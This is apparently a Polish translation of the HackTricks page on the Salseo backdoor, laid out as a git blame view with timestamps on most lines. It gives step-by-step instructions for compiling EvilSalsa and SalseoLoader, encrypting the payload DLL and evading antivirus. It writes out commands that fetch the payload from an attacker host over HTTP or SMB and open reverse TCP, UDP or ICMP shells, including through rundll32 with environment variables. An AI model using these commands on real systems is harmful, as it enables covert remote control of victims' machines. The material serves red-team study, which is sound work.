2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
< details >
2024-02-11 01:46:25 +00:00
< summary > < strong > Naucz się hakować AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2023-12-30 10:12:47 +00:00
2024-03-17 16:39:08 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** , sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
2024-03-17 16:39:08 +00:00
* **Dołącz do** 💬 [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-02-11 01:46:25 +00:00
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-03-17 16:39:08 +00:00
## Kompilacja binarnych plików
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
Pobierz kod źródłowy z githuba i skompiluj **EvilSalsa** i **SalseoLoader** . Będziesz potrzebować zainstalowanego **Visual Studio** do kompilacji kodu.
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
Skompiluj te projekty dla architektury systemu Windows, na którym będziesz ich używać (jeśli Windows obsługuje x64, skompiluj je dla tej architektury).
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
Możesz **wybrać architekturę** wewnątrz Visual Studio w zakładce ** "Build"** w ** "Platform Target".**
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
(\*\*Jeśli nie możesz znaleźć tych opcji, kliknij w ** "Project Tab"**, a następnie w ** "\<Project Name> Properties"**)
2020-07-15 15:43:14 +00:00
2022-08-10 14:32:58 +00:00
![](< .. / . gitbook / assets / image ( 132 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
Następnie zbuduj oba projekty (Build -> Build Solution) (W logach pojawi się ścieżka do pliku wykonywalnego):
2020-07-15 15:43:14 +00:00
2022-09-27 00:14:52 +00:00
![](< .. / . gitbook / assets / image ( 1 ) ( 2 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
## Przygotowanie backdooru
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
Po pierwsze, będziesz musiał zakodować **EvilSalsa.dll.** Aby to zrobić, możesz użyć skryptu pythona **encrypterassembly.py** lub skompilować projekt **EncrypterAssembly** :
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Python**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2024-03-29 21:12:26 +00:00
### Windows
2022-08-04 20:47:35 +00:00
### Windows
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2024-03-17 16:39:08 +00:00
Ok, teraz masz wszystko, czego potrzebujesz do wykonania całej rzeczy Salseo: **zakodowany EvilDalsa.dll** i **binarny plik SalseoLoader.**
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
**Prześlij binarny plik SalseoLoader.exe na maszynę. Nie powinny być one wykrywane przez żadne AV...**
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
## **Wykonaj backdoor**
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
### **Uzyskiwanie odwrotnego powłoki TCP (pobieranie zakodowanego dll przez HTTP)**
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
Pamiętaj, aby uruchomić nc jako nasłuchiwacz odwrotnej powłoki oraz serwer HTTP do obsługi zakodowanego evilsalsa.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2024-03-17 16:39:08 +00:00
### **Uzyskiwanie odwrotnej powłoki UDP (pobieranie zakodowanego pliku dll przez SMB)**
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
Pamiętaj, aby uruchomić nc jako nasłuchiwacz odwrotnej powłoki oraz serwer SMB do udostępniania zakodowanego pliku evilsalsa (impacket-smbserver).
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2024-03-17 16:39:08 +00:00
### **Uzyskiwanie odwrotnego powłoki ICMP (zakodowany plik DLL już w ofierze)**
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
**Tym razem potrzebujesz specjalnego narzędzia po stronie klienta, aby odebrać odwrotną powłokę. Pobierz:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
#### **Wyłącz odpowiedzi ICMP:**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2024-03-17 16:39:08 +00:00
#### Wykonaj klienta:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
2024-02-11 01:46:25 +00:00
#### Wewnątrz ofiary, wykonajmy rzecz zwaną salseo:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2024-03-29 21:12:26 +00:00
## Kompilowanie SalseoLoader jako DLL eksportujący funkcję główną
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Otwórz projekt SalseoLoader za pomocą programu Visual Studio.
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
### Dodaj przed funkcją główną: \[DllExport]
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
![](< .. / . gitbook / assets / image ( 2 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
### Zainstaluj DllExport dla tego projektu
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
#### **Narzędzia** --> **Menedżer pakietów NuGet** --> **Zarządzaj pakietami NuGet dla rozwiązania...**
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
![](< .. / . gitbook / assets / image ( 3 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
#### **Wyszukaj pakiet DllExport (używając karty Przeglądaj) i naciśnij Zainstaluj (i zaakceptuj okno popup)**
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
![](< .. / . gitbook / assets / image ( 4 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
W folderze projektu pojawiły się pliki: **DllExport.bat** i **DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
### **D**einstalacja DllExport
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
Naciśnij **Odinstaluj** (tak, to dziwne, ale uwierz mi, jest to konieczne)
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
![](< .. / . gitbook / assets / image ( 5 ) ( 1 ) ( 1 ) ( 2 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
### **Zamknij Visual Studio i wykonaj DllExport\_configure**
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Po prostu **zamknij** Visual Studio
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
Następnie przejdź do folderu **SalseoLoader** i **wykonaj plik DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
Wybierz **x64** (jeśli zamierzasz użyć go wewnątrz x64, tak było w moim przypadku), wybierz **System.Runtime.InteropServices** (wewnątrz **Namespace for DllExport** ) i naciśnij **Zastosuj**
2020-07-15 15:43:14 +00:00
2023-12-27 23:58:16 +00:00
![](< .. / . gitbook / assets / image ( 7 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
### **Otwórz projekt ponownie w Visual Studio**
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
**\[DllExport]** nie powinien być już oznaczony jako błąd
2020-07-15 15:43:14 +00:00
2023-06-13 10:12:02 +00:00
![](< .. / . gitbook / assets / image ( 8 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
### Zbuduj rozwiązanie
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
Wybierz **Typ wyjściowy = Biblioteka klas** (Projekt --> Właściwości SalseoLoader --> Aplikacja --> Typ wyjścia = Biblioteka klas)
2020-07-15 15:43:14 +00:00
2022-10-22 15:26:54 +00:00
![](< .. / . gitbook / assets / image ( 10 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Wybierz **platformę x64** (Projekt --> Właściwości SalseoLoader --> Kompilacja --> Platforma docelowa = x64)
2020-07-15 15:43:14 +00:00
2022-09-02 15:27:38 +00:00
![](< .. / . gitbook / assets / image ( 9 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-29 21:12:26 +00:00
Aby **zbudować** rozwiązanie: Buduj --> Buduj rozwiązanie (W konsoli wyjściowej pojawi się ścieżka nowego pliku DLL)
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
### Przetestuj wygenerowane Dll
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
Skopiuj i wklej plik DLL tam, gdzie chcesz go przetestować.
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Wykonaj:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
2024-03-29 21:12:26 +00:00
Jeśli nie pojawi się żaden błąd, prawdopodobnie masz działającą DLL!!
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
## Uzyskaj powłokę, korzystając z DLL
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
Nie zapomnij użyć **serwera HTTP** i ustawić **nasłuchiwacza nc**
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Powershell
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2022-08-04 20:47:35 +00:00
### CMD
2020-07-15 15:43:14 +00:00
2024-03-17 16:39:08 +00:00
### CMD
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
< details >
2024-02-11 01:46:25 +00:00
< summary > < strong > Naucz się hakować AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2023-12-30 10:12:47 +00:00
2024-03-29 21:12:26 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** , sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-03-17 16:39:08 +00:00
* Kup [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-02-11 01:46:25 +00:00
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
2024-03-17 16:39:08 +00:00
* **Dołącz do** 💬 [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-03-29 21:12:26 +00:00
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repozytoriów na GitHubie.
2022-04-28 16:01:33 +00:00
< / details >